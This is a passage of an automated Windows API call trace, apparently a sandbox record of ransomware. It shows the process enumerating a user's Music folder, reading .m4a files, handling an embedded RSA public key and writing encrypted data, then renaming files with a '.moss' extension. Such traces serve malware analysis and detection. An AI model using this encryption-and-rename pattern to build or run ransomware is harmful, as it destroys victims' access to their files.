hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0170.015] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc170 | out: hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc170 [0170.015] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0170.015] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0170.015] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0170.015] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0170.015] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0170.015] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc170 | out: hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48820 [0170.015] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f140 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc1a0 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc188 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc158 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc140 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4bd70 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0170.016] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0170.017] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.017] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.017] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0170.017] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0170.017] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.017] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.017] WriteFile (in: hFile=0x664, lpBuffer=0x3b4cd10*, nNumberOfBytesToWrite=0x2b14, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b4cd10*, lpNumberOfBytesWritten=0x401fb14*=0x2b14, lpOverlapped=0x0) returned 1 [0170.017] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cd10 | out: hHeap=0xcd0000) returned 1 [0170.017] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2b19, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.017] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.017] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0170.017] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0170.017] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0170.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0170.017] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0170.017] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0170.018] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0170.018] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0170.018] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.018] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.018] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.018] CloseHandle (hObject=0x664) returned 1 [0170.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0170.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0170.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0170.027] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CsANIO3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\csanio3.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CsANIO3.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\csanio3.m4a.moss")) returned 1 [0170.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.027] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0170.029] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e99320, ftCreationTime.dwHighDateTime=0x1d5e2fe, ftLastAccessTime.dwLowDateTime=0xc7aff4c0, ftLastAccessTime.dwHighDateTime=0x1d5e2f5, ftLastWriteTime.dwLowDateTime=0xc7aff4c0, ftLastWriteTime.dwHighDateTime=0x1d5e2f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D99YKJDL-0LajD", cAlternateFileName="D99YKJ~1")) returned 1 [0170.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0170.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0170.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0170.029] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d0ec80, ftCreationTime.dwHighDateTime=0x1d5df00, ftLastAccessTime.dwLowDateTime=0xe45dc290, ftLastAccessTime.dwHighDateTime=0x1d5e71f, ftLastWriteTime.dwLowDateTime=0xe45dc290, ftLastWriteTime.dwHighDateTime=0x1d5e71f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DENcIRfHVVVix5", cAlternateFileName="DENCIR~1")) returned 1 [0170.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2d68 [0170.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0170.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0170.030] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0170.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0170.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0170.030] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned=".ini" [0170.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0170.030] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96272d10, ftCreationTime.dwHighDateTime=0x1d5e06b, ftLastAccessTime.dwLowDateTime=0x91faa8c0, ftLastAccessTime.dwHighDateTime=0x1d5db39, ftLastWriteTime.dwLowDateTime=0x91faa8c0, ftLastWriteTime.dwHighDateTime=0x1d5db39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HCQjXtcJ8s9B2R_", cAlternateFileName="HCQJXT~1")) returned 1 [0170.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f28b8 [0170.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0170.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0170.030] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6838050, ftCreationTime.dwHighDateTime=0x1d5d8d6, ftLastAccessTime.dwLowDateTime=0xd1021dd0, ftLastAccessTime.dwHighDateTime=0x1d5e1fd, ftLastWriteTime.dwLowDateTime=0xd1021dd0, ftLastWriteTime.dwHighDateTime=0x1d5e1fd, nFileSizeHigh=0x0, nFileSizeLow=0xfcf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kz0qvM tTpZbsG5.m4a", cAlternateFileName="KZ0QVM~1.M4A")) returned 1 [0170.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0170.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0170.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0170.030] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Kz0qvM tTpZbsG5.m4a") returned=".m4a" [0170.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Kz0qvM tTpZbsG5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kz0qvm ttpzbsg5.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.031] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=64761) returned 1 [0170.031] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.034] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xfcd3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.034] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.035] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.035] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.035] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.036] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xfcf9, lpOverlapped=0x0) returned 1 [0170.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.036] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.036] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f140) returned 1 [0170.037] CryptCreateHash (in: hProv=0xd2f140, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.038] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.038] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.038] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.038] GetLastError () returned 0x0 [0170.038] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.038] CryptReleaseContext (hProv=0xd2f140, dwFlags=0x0) returned 1 [0170.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.038] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.038] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.038] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xfd00) returned 0x3b62d40 [0170.039] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0170.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bd70 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc140 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bdb8 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc158 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc188 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc1a0 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0170.039] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ef80 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc188 | out: hHeap=0xcd0000) returned 1 [0170.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc1a0 | out: hHeap=0xcd0000) returned 1 [0170.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc1a0 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc188 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0170.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc1a0 | out: hHeap=0xcd0000) returned 1 [0170.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc188 | out: hHeap=0xcd0000) returned 1 [0170.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0170.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ef80 | out: hHeap=0xcd0000) returned 1 [0170.040] GetCurrentThreadId () returned 0x324 [0170.040] RtlAllocateHeap 